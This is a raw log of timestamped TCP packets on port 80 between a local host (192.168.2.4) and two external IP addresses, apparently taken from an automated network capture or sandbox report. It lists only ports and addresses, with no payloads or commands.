Apr 27, 2024 02:19:15.564626932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.575830936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.575849056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.575902939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.577691078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.577743053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.578027964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.578046083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.578099012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.578099012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.628381968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.628452063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.628549099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.628601074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.633183956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.633245945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.633296967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.633407116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.633454084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.633490086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.633543968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.675777912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.675868988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.690701008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.690776110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.728961945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729028940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.729065895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729105949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.729123116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729165077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.729201078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729233980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729262114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.729295015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.729327917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.729403973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.734179974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.734253883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.734277964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.734298944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.734308958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.734338999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.734345913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.734385014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.735034943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.735081911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.735104084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.735152006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.735171080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.735189915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.735232115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.735646963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.735701084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.772458076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.772514105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.772536993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.772579908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.772594929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.772633076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.774840117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.774893045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.774929047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.774976969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.775028944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.775075912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.775101900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.775147915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.825113058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.825133085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.825242043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.829600096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.829665899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.829689026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.862579107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.862637997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.862662077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.862715006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.871440887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.873586893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.909362078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.909439087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.909533024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.909552097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.909593105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.909626961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.909905910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.909970045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.910067081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.910085917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.910103083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.910123110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.910156012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.910156012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.910531998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.910548925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:15.910584927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.910615921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:15.924510002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.924580097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.924887896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.925905943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.925956964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:15.926327944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:15.980804920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.019586086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019654989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019674063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019709110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.019764900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019818068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.019862890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019923925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.019959927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.023633003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.023693085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.023744106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.023773909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.033516884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.033585072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.066375017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.066427946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.079798937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.079881907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.079888105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.079933882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.079960108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080039024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.080060005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080183029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.080231905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080317020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080379009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.080389023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080467939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.080517054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.081135035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.081201077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.081281900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.081377983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.119164944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.119199991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.119270086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.120290041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.120441914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.120548964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.174988985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.204488039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.204730034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.204801083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.214596033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.214710951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.214761972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.214843988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.214898109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.214935064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.215086937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.215137959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.215208054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.218559027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.218671083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.218713999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.218766928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.218810081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.250315905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.250473976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.250566006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.250734091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.250782967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.250823021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.250871897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.250906944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.250962019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.250978947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.251024961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.251044989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.251096964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.251102924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.251152992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.251451015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.251498938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.251533031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.251583099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.260771036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.260833979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.262751102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.313529968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.313657045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.313709021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.314873934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.315066099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.315114021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.375740051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.375799894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.375808954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.375854969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.409300089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409449100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409468889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409506083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409519911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.409609079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409611940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.409672022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.409729004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.413110971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.413191080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.413244009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.413286924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.413355112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.413399935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.420722008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.420768976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.420783043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.420821905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.420902014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.420949936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.420973063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421034098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.421261072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421318054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.421365976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421442032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.421475887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421518087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421576023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.421593904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421643972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.421735048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.421804905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.457092047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.457173109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.457281113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.457340956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.509589911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.509933949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.509988070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.510761023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.546071053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.546138048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.546221018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.546622038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.558938026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.592266083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592370987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592391014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592444897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.592483997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.592525959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592581987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.592601061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592652082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.592699051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.592756033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.593066931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.593127012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.593159914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.593235016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.593419075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.593487978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.593538046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.593612909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.604877949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.604963064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.604981899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.604996920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.605007887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.605057955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.605081081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.605129004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.605145931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.605211020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.605252981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.605293036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.608412027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.608458042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.608495951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.608514071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.608541965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.608571053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.608594894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.608620882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.652777910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.652861118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.652877092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.652913094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.652951002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.653048038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.705739021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.705852985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.705873966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.705899954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.717850924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.717915058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.753457069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.753546000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.764445066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764508009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764513969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764569998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764570951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764621973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764624119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764678955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764678955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764731884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764735937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764785051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.764883041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.764970064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.765094042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.765280962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.765337944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.765398026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.765469074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.801244020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.801315069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.801357985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.801414013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.801434994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.801486969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.801536083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.801587105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.801614046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.804610968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.804843903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.804925919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:16.804965019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.817269087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:16.817392111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:16.848570108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.848629951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:16.848717928 CEST	49734	80	192.168.2.4	176.97.76.106
